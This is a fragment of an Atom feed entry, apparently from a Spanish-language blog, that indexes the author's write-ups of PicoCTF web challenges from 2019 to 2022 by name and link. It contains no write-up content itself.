      <td>Insp3ct0r</td>
      <td><a href="/insp3ct0r">Link</a></td>
    </tr>
    <tr>
      <td>where are the robots</td>
      <td><a href="/where-are-the-robots">Link</a></td>
    </tr>
    <tr>
      <td>logon</td>
      <td><a href="/logon">Link</a></td>
    </tr>
    <tr>
      <td>dont-use-client-side</td>
      <td><a href="/dont-use-client-side">Link</a></td>
    </tr>
    <tr>
      <td>picobrowser</td>
      <td><a href="/picobrowser">Link</a></td>
    </tr>
    <tr>
      <td>Client-side-again</td>
      <td><a href="/client-side-again">Link</a></td>
    </tr>
    <tr>
      <td>Irish-Name-Repo 1</td>
      <td><a href="/irish-name-repo-1">Link</a></td>
    </tr>
    <tr>
      <td>Irish-Name-Repo 2</td>
      <td><a href="/irish-name-repo-2">Link</a></td>
    </tr>
    <tr>
      <td>Irish-Name-Repo 3</td>
      <td><a href="/irish-name-repo-3">Link</a></td>
    </tr>
    <tr>
      <td>JaWT Scratchpad</td>
      <td><a href="/jawt-scratchpad">Link</a></td>
    </tr>
  </tbody>
</table>

<h2 id="picoctf-2021">PicoCTF 2021</h2>
<hr />

<table>
  <thead>
    <tr>
      <th>Nombre del reto</th>
      <th>Link</th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td>GET aHEAD</td>
      <td><a href="/get-ahead">Link</a></td>
    </tr>
    <tr>
      <td>Cookies</td>
      <td><a href="/cookies">Link</a></td>
    </tr>
    <tr>
      <td>Scavenger Hunt</td>
      <td><a href="/scavenger-hunt">Link</a></td>
    </tr>
    <tr>
      <td>Some Assembly Required 1</td>
      <td><a href="/some-assembly-required-1">Link</a></td>
    </tr>
    <tr>
      <td>Who are you?</td>
      <td><a href="/who-are-you">Link</a></td>
    </tr>
  </tbody>
</table>

<h2 id="picomini-by-redpwn">PicoMini by redpwn</h2>
<hr />

<table>
  <thead>
    <tr>
      <th>Nombre del reto</th>
      <th>Link</th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td>login</td>
      <td><a href="/login">Link</a></td>
    </tr>
    <tr>
      <td>caas</td>
      <td><a href="/caas">Link</a></td>
    </tr>
  </tbody>
</table>

<h2 id="picoctf-2022">PicoCTF 2022</h2>
<hr />

<table>
  <thead>
    <tr>
      <th>Nombre del reto</th>
      <th>Link</th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td>Includes</td>
      <td><a href="/includes">Link</a></td>
    </tr>
    <tr>
      <td>Inspect HTML</td>
      <td><a href="/inspect-html">Link</a></td>
    </tr>
    <tr>
      <td>Local Authority</td>
      <td><a href="/local-authority">Link</a></td>
    </tr>
    <tr>
      <td>Search Source</td>
      <td><a href="/search-source">Link</a></td>
    </tr>
    <tr>
      <td>Forbidden Paths</td>
      <td><a href="/forbidden-paths">Link</a></td>
    </tr>
    <tr>
      <td>Power Cookie</td>
      <td><a href="/power-cookie">Link</a></td>
    </tr>
    <tr>
      <td>Roboto Sans</td>
      <td><a href="/roboto-sans">Link</a></td>
    </tr>
    <tr>
      <td>Secrets</td>
      <td><a href="/secrets">Link</a></td>
    </tr>
    <tr>
      <td>SQL Direct</td>
      <td><a href="/sql-direct">Link</a></td>
    </tr>
    <tr>
      <td>SQLiLite</td>
      <td><a href="/sqlilite">Link</a></td>
    </tr>
  </tbody>
</table>]]></content><author><name>Lepra</name></author><summary type="html"><![CDATA[Link de la página: https://picoctf.org/]]></summary></entry></feed>